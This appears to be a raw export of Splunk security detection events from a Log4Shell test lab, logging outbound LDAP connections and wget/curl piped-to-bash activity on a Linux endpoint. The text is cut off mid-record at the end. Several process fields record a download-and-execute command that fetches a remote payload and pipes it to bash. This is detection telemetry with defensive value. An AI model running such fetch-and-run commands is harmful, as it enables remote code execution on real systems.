following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638556, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638556, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 